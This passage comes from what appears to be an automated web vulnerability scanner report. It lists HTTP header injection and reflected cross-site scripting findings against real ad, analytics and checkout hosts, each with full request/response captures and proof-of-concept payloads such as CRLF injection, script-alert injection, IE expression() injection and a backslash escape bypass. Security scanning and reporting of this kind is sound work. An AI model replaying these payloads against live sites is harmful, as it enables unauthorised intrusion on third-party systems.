Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=0&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 0744fd--><script>alert(1)</script>aa703b77027|372 -- -->
...[SNIP]...

4. HTTP header injection  previous  next
There are 4 instances of this issue:


4.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lj.homepage/loggedout

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69b58%0d%0afb4aa952766 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69b58%0d%0afb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69b58
fb4aa952766
/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837:
Date: Mon, 25 Apr 2011 14:33:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d65f3%0d%0ab88a010799e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifd65f3%0d%0ab88a010799e?1303741320269 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifd65f3
b88a010799e
:
Date: Mon, 25 Apr 2011 14:56:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.yandex.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c396e%0d%0ac1277611b7a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e%0d%0ac1277611b7a?67253133 HTTP/1.1
Host: bs.yandex.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:43 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:34:43 GMT
Expires: Mon, 25 Apr 2011 14:34:43 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ruc396e
c1277611b7a
/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e
c1277611b7a,1981869761303741204?67253133
Content-Length: 0


4.4. http://pretty.ru/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pretty.ru
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9656f%0d%0a539e8d0607b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9656f%0d%0a539e8d0607b HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domhit=1; randomhit=177203261; LP_CH_C=love_cookies; __utmz=1.1303741245.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.850278810.1303741245.1303741245.1303741245.1; __utmc=1; __utmb=1.1.10.1303741245

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 25 Apr 2011 14:56:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Location: /a-main/param-notfound/login-9656f
539e8d0607b
:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:56:13 GMT
Content-Length: 100

<!-- 0.019777 --><!--hostip=kenobi-->
<!--revision=2011-04-22-->
<!--revision_tmpl=2011-04-22_v2-->

5. Cross-site scripting (reflected)  previous  next
There are 68 instances of this issue:


5.1. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 86c33<script>alert(1)</script>797754eeb was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A16F926F5AA4C8CAA4023FBBBAB7879A; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:18 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_28966886c33<script>
...[SNIP]...

5.2. http://an.yandex.ru/code/47934 [target-ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/47934

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de788(a)f60c8b163e7 was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=de788(a)f60c8b163e7&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:47:53 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:47:53 GMT
Expires: Mon, 25 Apr 2011 14:47:53 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

<!-- Bad partner/domain for page 47934 (0, de788(a)f60c8b163e7) -->

5.3. http://an.yandex.ru/code/57617 [target-ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ff26(a)615e8e384bf was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=2ff26(a)615e8e384bf&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:22:57 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:22:57 GMT
Expires: Mon, 25 Apr 2011 14:22:57 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

<!-- Bad partner/domain for page 57617 (0, 2ff26(a)615e8e384bf) -->

5.4. http://an.yandex.ru/code/66894 [target-ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ad56b(a)20328a529f was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/66894?rnd=148599&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=ad56b(a)20328a529f&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:24:47 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:24:47 GMT
Expires: Mon, 25 Apr 2011 14:24:47 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 66

<!-- Bad partner/domain for page 66894 (0, ad56b(a)20328a529f) -->

5.5. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 97042<script>alert(1)</script>906f6279423 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:28 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423("");

5.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21856\' style=x:expression(alert(1)) b662ee241cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/?21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:45 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110531729:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VXMTN1NJZvQ6fx6SQq6bnR2Yztv7L6v79G1pNDsYlHnL2NW1VbWYQynfwrCTfhNmdJf0N1pvRxWRVBGXCQTGYT0LZTpCPytnGtVysYRypnS56r06v0mkRXCmkzXVSVrd!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2422


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=core&21856\' style=x:expression(alert(1)) b662ee241cf=1&21856\'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1'>
...[SNIP]...

5.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8226f\'%3balert(1)//b3b0eb2a796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8226f\\';alert(1)//b3b0eb2a796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /core/?8226f\'%3balert(1)//b3b0eb2a796=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:57 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704362580:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=byykN1NVD9GV54JxSWRsMvBTxhWWpyzhrfD56p2fM5lLyD4ZGXvzTLJXNyy8xh2F9cPqgPJ6sWyNTvPshQdv6JWL4dS2RpvcpfkcVvY52cFxxGhFrYTp9bLnXcvfQsy5!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2338


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=core&8226f\\';alert(1)//b3b0eb2a796=1&8226f\\'%3balert(1)//b3b0eb2a796=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...

5.8. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.kronos.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload caea3<script>alert(1)</script>a8615876143 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.kronos.com/p.json?callback=_ate.ad.hprcaea3<script>alert(1)</script>a8615876143&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.kronos.com%2Fabout%2Fabout-kronos.aspx&zzr8oz HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 13:51:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 13:51:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 13:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 13:51:39 GMT
Connection: close

_ate.ad.hprcaea3<script>alert(1)</script>a8615876143({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.9. http://event.adxpose.com/event.flow [uid parameter]  previous  next

